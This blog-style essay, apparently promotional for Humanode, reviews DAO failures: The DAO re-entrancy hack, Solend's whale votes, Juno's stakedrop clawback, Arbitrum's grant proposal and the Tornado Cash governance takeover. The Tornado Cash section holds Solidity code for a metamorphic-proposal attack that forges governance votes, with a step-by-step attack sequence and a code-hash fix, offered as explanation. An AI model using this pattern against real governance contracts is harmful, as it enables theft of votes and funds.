When DAOs Fail

A decentralized autonomous organization (DAO) is a popular governance structure, often seen in blockchain projects, that has no central governing body and whose members share (or are supposed to share) a common goal of acting in the best interest of the entity or project.

Historically speaking, a DAO is a concept that can be traced back to the 1990s and was popularized by Vitalik Buterin, the creator of Ethereum, in 2014.  It can take multiple forms.  One could use a DAO to form a digital company running independently free of interference and 'backdoor deals', or it could be used to assist the implementation of Liquid Democracy-style vote delegation. There could be thousands of different types of DAOs, all with different sets of voting mechanisms, purposes, and limitations.

Unlike conventional centralized entities, DAOs have no central authority; power is usually distributed across token holders who collectively cast votes.  All votes and governance activity are recorded on a blockchain, meaning that every member's actions are publicly viewable.

In simple terms, many believe that DAOs are emerging as the foundation for decentralized governance.

But, as all of us know, growth is accompanied by pain.  Who doesn’t remember embarrassing moments from when they were 13 or 14 years old?  You have to learn how to crawl before you walk or run.  It is guaranteed that you will fall down more than once or twice in the process.  And even then, when you learn how to run, you need to beware of traffic and of others who may have malicious intent.  To make things worse, everybody knows that the road to hell is paved with good intentions.

So, what happens when DAOs fail?  Although almost all of the incidents below were the result of “good intentions”, “unforeseen accidents”, or “human nature vs ideals”, there is much to learn from “how” and “what” went wrong.

One of the first that comes to mind is the often-misunderstood “heist of the century”: the hack of The DAO, which caused Ethereum to fork into Ethereum and Ethereum Classic.

The DAO was one of the first frameworks that tried to realize the “vision” explained in Vitalik's whitepaper.  It was built by Slock.it, a software company, as a free, libre, open-source framework for anyone to modify, launch, and operate DAOs as they see fit.

One group of talented, hardworking, unpaid volunteers then took the framework, gained traction, and launched “The DAO” as an investor-directed venture capital fund on the Ethereum chain.  The DAO launched in April 2016 and became one of the largest crowdfunding campaigns in history, raising 11.5 million ETH via a token sale.

At the time, those tokens were worth $150 million.  Unfortunately, The DAO's contract contained a bug now known as a 're-entrancy' vulnerability: it sent ETH to a caller before updating that caller's balance, so a malicious recipient contract could call back into the withdrawal function and take the same balance out again before it was zeroed.  The attacker used it to drain ⅓ of the ETH from The DAO.  This means that 50 million USD was vandalized and siphoned into a "child DAO" split off from The DAO.

What is amazing is that if that money had actually made it off the chain, it would be worth $11,207,340,000 at today’s value.

Fortunately, The DAO's split mechanism imposed a 28-day holding period before funds in a child DAO could be withdrawn, meaning that the money did not go poof.  Eventually, the Ethereum network was hard-forked to move the funds to a recovery address where their original owners could exchange them back for ETH, but the fork permanently split the chain into Ethereum and Ethereum Classic.

A grand idea full of good intentions, but haunted by faulty code.  The DAO itself was written in Solidity, so the language was not the culprit; the bug was in the order in which the contract did its external call and its state update.  Solidity tooling and best practices (checks-effects-interactions, re-entrancy guards) have improved since.  Oh, and the “re-entrancy attack”?  It still plagues Ethereum-based projects and contracts to this day.

Voter Apathy and Plutocracies

DAOs are designed to remove centralized hierarchies and promote collective governance through on-chain voting.  Unfortunately, for various reasons, a shockingly high number of DAOs fail due to voter apathy.  Even at Uniswap, one of the biggest DAOs in the crypto space, average voter turnout is 0.33%, and according to Xuan Liu’s comprehensive study of over 50 popular DAOs (The Illusion of Democracy? An Empirical Study of DAO Governance and Voting Behavior, 2023), on average only about 1.77% of those eligible vote.

Then again, a June 2022 report by Chainalysis found that in 10 major DAOs, less than 1% of all holders control 90% of the voting power.  In short, many “decentralized” systems and DAOs resemble plutocracies where only the richest participants can, or do, actually influence the outcome of proposals.

Although plenty of DAOs have failed due to voter apathy and voter gridlock, such as MCC DAO, which focused on building tools for launching and managing DAOs on Ethereum, nothing compares to the mess that Solend, the Solana-based lending and borrowing DAO, faced.

One day, Solend discovered that a single ‘whale’ had gained a near-monopoly on two of the protocol’s lending assets, threatening a crash of the SOL and SLND markets it depended on.  The whale had deposited 5.7 million SOL as collateral to borrow $108 million worth of USDT and USDC.  That amounted to 95% of all SOL deposited and 88% of all USDC borrowed from the main asset pool, and 25% of the platform's Total Value Locked.  The problem was that if the price of SOL dropped to $22.30, 20% of the whale’s borrows (about $21 million worth of SOL) would become liquidatable, and a liquidation of that size could not be absorbed by the on-chain market.  It could have crashed the price, might very well have been the end of Solend, and would have been a nasty blow for Solana.

The thing was, people noticed, and others withdrew as much as they could, pushing the “utilization” of USDC and USDT to 100% and locking everyone else in.  To make bad worse, positions that used USDT or USDC as collateral could no longer be liquidated either.  Panic set in, and it looked like the ship was about to sink.

What did they do?  They put up the very first governance vote of their DAO: grant Solend Labs “emergency power” to take control of the whale’s account and, if push came to shove, liquidate the 20% over the counter rather than through the DEX.

It was an emergency vote conducted within a few hours, and less than 1% of eligible voters took part, but YES won 1.1 million votes to 30,000.  A clean victory, right?  Well, not so.  98% of the 1.1 million votes came from a single user.

The community was livid.  People realized two big issues: this might not be a true “democracy”, and “assets deposited into the platform can be confiscated by the team at any time”.  All it would take was a couple of whales holding governance tokens voting together, and others could theoretically be wiped out.

Shortly thereafter, a second emergency vote nullified the first and set a 24-hour voting window instead of the original three or so hours.  This also passed thanks to the 1 million votes held by that single user.  Then a third vote limited how much a single account could borrow to $50 million and immediately enacted rolling, per-account liquidations of positions exceeding that limit (in this vote, the million-vote holder made up only 67% of the YES side, which won with 99.7% of all votes).

Around this time the price of SOL stabilized and the immediate danger was averted, but the whole fiasco highlighted the danger of one user holding a majority of the voting power in a DAO, and of governance being able to “re-write” the ledger to give third parties access to users’ accounts.

The Cosmos-based Juno blockchain is another reminder of the challenges blockchain-based governance faces, and it was also a test of one blockchain community’s values.

The story goes like this.  Juno, which had just launched, decided to hold an airdrop to bring in new users.  Being smart, they held a “stakedrop”, rewarding JUNO tokens 1:1 for ATOM tokens “staked” on the Cosmos Hub blockchain.  Unfortunately, since Humanode's BotBasher had not yet been introduced to the world, Juno kept it simple and capped the claim at 50,000 JUNO per wallet.  What they didn’t expect was a single user going Sybil on them with 50 different wallets.  In short, the user had formed an “investment group”, pooled enough ATOM tokens, and claimed 10% (roughly $120 million at the time) of JUNO’s total token supply in the airdrop.

It might have gone unnoticed, but this user, who intended to eventually return the tokens to “his” investors and “clients”, gathered all of them into one single wallet, and he was busted.

Although one of Juno's founders believed the airdrop should not be reversed, the community did not agree, and a proposal was made to strip the user of the “ill-gained” tokens, leaving him with only 50,000.  The revoked tokens were to be moved into a community-controlled Unity contract, after which the community could vote on how to use the funds.  *note: by this time the token had tanked 60%, and the $120 million was now worth $36 million.

Yes, there were threats of legal action, and everything got messy.  But as a final kick, a copy-and-paste error in the smart contract sent the funds to a wrong address on the blockchain that nobody had access to.  Oops.

In the end, further proposals had to be voted on, and new code had to be put in place to rewrite Juno’s ledger so that the stranded funds were reassigned to Unity.  Needless to say, this ordeal cast a shadow on Juno's future, and combined with the network being halted a number of times due to numerous smart-contract attacks, the token that was once worth $40 is currently worth $0.2.

Governance is hard

Governance in general is hard.  That is nothing new.  When structuring a new organization’s governance structure, the best advice that one could give is to “build for growth”.

If you start out building based on “what is easier” for the sake of speed, the result is often little to no governance and expensive mistakes; but if you build on a rock-solid ideal of well-established, highly professional practices with multiple rigid checks and balances, the result is often a ship built out of concrete that sinks before it sails.

One DAO that discovered this the hard way was Arbitrum DAO.  Its governing model is labeled “full on-chain governance”.

The issue became apparent when Arbitrum realized that voter apathy was a problem and that not everyone will vote on small issues.  Too many things to vote on, and people just don’t show up.  They realized that a growth cycle needs speed, but “governance was getting clogged up by grants proposals, and too many small proposals would cause voter fatigue”.

Thus, the 12-member council of the Arbitrum DAO put forward a proposal that included moving 750 million ARB tokens, worth nearly $1 billion, to the Arbitrum Foundation so that it could bypass “full on-chain governance” and make quick decisions on who would get grants for what.  The goal was to speed up the process so they could keep pace with growth.

Unfortunately, the community did not agree.  In the very same proposal, Arbitrum had talked about how every vote counted in “full on-chain governance”, and that “full on-chain governance” was the core of the project.  So why create a “backdoor”?  Whose pet project would the money go to?

Over 70% of those who voted, voted NO, and the council had to retract the proposal.  Back to the drawing board…

Hack the way to power?

One common issue in many DAOs is that money (tokens held) = voting power (and the power to make proposals).  Yes, plutocracy, as mentioned above, is an issue, and it is one of the main contributors to voter apathy, especially when many holders believe the only value their governance tokens have is monetary, and so hold them just to sell when the price is right.

Tornado Cash DAO (the governance of a “privacy-preserving mixer” on Ethereum) found out the hard way that governance tokens are not always the answer to proper governance, when an attacker floated a malicious proposal whose hidden code, once executed, let him rewrite the vote balances held in the governance contract.  He withdrew 10,000 votes as TORN and sold it all, granted himself 1.2 million governance votes (worth over $4 million in TORN at the time), exchanged 380,000 TORN for 372 ETH, and ran the proceeds back through the privacy protocol.

This attack did not exploit the mixer's own smart contracts or the technology behind Tornado Cash; it was just a little malicious code aimed at the DAO.  The attacker made a proposal asking community members to vote for or against increasing the amount of staked TORN needed to become a Tornado Cash relayer, and penalizing relayers attempting to avoid having their stake slashed.  He claimed his proposal used the same logic as a prior proposal that had already passed, and the voters failed to check the deployed code.

What people did not expect was that the proposal contract also carried a self-destruct function.  Once the vote had passed, the attacker self-destructed the proposal contract and, using deterministic deployment (a CREATE2 factory whose nonce reset when it too was destroyed and redeployed), placed brand-new, malicious code at the very same address, so that is what governance executed.  This gave him the power to withdraw all locked governance votes and drain all the tokens from the governance contract.  The hacker, or more likely a giga-troll, then turned around and made another proposal to revert all the damage he had done, and the damage was promptly reverted.
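The following is an added illustration of that “metamorphic proposal” trick, written for this article and not Tornado Cash's code.  It shows why a CREATE2-deployed factory lets different code land at the same child address after a self-destruct, why delegatecall-style execution lets such code write straight into the governance contract's storage, and the one check that closes the hole: pin the target's code hash at proposal time and refuse to execute if it has changed.  All contract and function names (Factory, Deployer, HonestProposal, EvilProposal, Governance, lockedBalance) are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration of the metamorphic-proposal trick; not Tornado Cash's code.
// Names are assumptions. selfdestruct emits a deprecation warning on 0.8.18+.

// Step 1: a Factory at a CREATE2 address (fixed by deployer + salt + init code).
// Children are made with plain CREATE, so a child's address depends only on the
// factory address and the factory's nonce, NOT on the child's code.
contract Factory {
    function deploy(bytes memory creationCode) external returns (address child) {
        assembly {
            child := create(0, add(creationCode, 0x20), mload(creationCode))
        }
        require(child != address(0), "create failed");
    }
    // Destroying the factory resets its nonce; redeploying it with the same salt
    // puts it back at the same address, so the next CREATE reuses the old child address.
    function kill() external { selfdestruct(payable(msg.sender)); }
}

contract Deployer {
    function deployFactory(bytes32 salt) external returns (address) {
        return address(new Factory{salt: salt}());
    }
}

// What voters reviewed: a harmless-looking parameter change.
contract HonestProposal {
    function executeProposal() external pure {}
    function kill() external { selfdestruct(payable(msg.sender)); }
}

// What ran: same selector, same address, different code. Executed via
// delegatecall it writes into the governance contract's storage, so its slot 0
// must mirror Governance's layout (the lockedBalance mapping).
contract EvilProposal {
    mapping(address => uint256) public lockedBalance; // slot 0, mirrors Governance
    address private immutable beneficiary;            // immutable: lives in code, not storage
    constructor(address b) { beneficiary = b; }
    function executeProposal() external {
        lockedBalance[beneficiary] += 1_200_000 ether; // fake votes, no TORN needed
    }
}

contract Governance {
    mapping(address => uint256) public lockedBalance;              // slot 0
    struct Proposal { address target; bytes32 codeHash; bool executed; }
    Proposal[] public proposals;                                    // slot 1

    function propose(address target) external returns (uint256 id) {
        require(target.code.length > 0, "target has no code");
        // Record the hash of the code voters are actually reviewing.
        proposals.push(Proposal(target, target.codehash, false));
        return proposals.length - 1;
    }

    // Vulnerable pattern: runs whatever code sits at p.target on execution day.
    function executeUnchecked(uint256 id) external {
        Proposal storage p = proposals[id];
        require(!p.executed, "already executed");
        p.executed = true;
        (bool ok, ) = p.target.delegatecall(abi.encodeWithSignature("executeProposal()"));
        require(ok, "execution failed");
    }

    // Hardened pattern: refuse if the code at the target changed since the vote.
    function execute(uint256 id) external {
        Proposal storage p = proposals[id];
        require(!p.executed, "already executed");
        require(p.target.codehash == p.codeHash, "proposal code changed since vote");
        p.executed = true;
        (bool ok, ) = p.target.delegatecall(abi.encodeWithSignature("executeProposal()"));
        require(ok, "execution failed");
    }
}
```

The attack sequence against executeUnchecked: deploy the Factory through Deployer with some salt; call Factory.deploy(type(HonestProposal).creationCode), which yields child address P; propose(P) and let the vote pass; in one transaction call HonestProposal(P).kill() and Factory.kill(); in a later transaction redeploy the Factory with the same salt (same address, nonce back to 1) and call deploy with abi.encodePacked(type(EvilProposal).creationCode, abi.encode(attacker)), which lands at P again; executeUnchecked then credits the attacker 1.2 million votes.  The hardened execute reverts at the codehash check instead.  Two caveats: a self-destructed address cannot be redeployed within the same transaction, since selfdestruct only takes effect at the end of it; and since Ethereum's Dencun upgrade (EIP-6780) selfdestruct no longer removes code unless it runs in the transaction that created the contract, so this particular trick no longer works on mainnet, but pinning the code hash remains the right defence on any chain where code at an address can change.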

Naturally, even a perfect DAO would not have saved Tornado Cash from indictments for creating a platform that laundered $7 billion in crypto and allowed $1 billion in criminal proceeds to be laundered through the service, including hundreds of millions from the Lazarus Group, a sanctioned North Korean cybercrime organization… Having said that, they did give the world a good example of what can go wrong in a DAO when people are not paying attention.

With all the growing pains and failures, DAOs are still seen as the path forward.  It is just that the ideal DAO has not been found yet.  But each failure teaches a valuable lesson, and with each lesson that is properly addressed by the communities, DAOs will only grow stronger.  Perhaps it is time to take a look at what the Humanode Vortex brings to the table to address many of the issues seen in today's DAOs.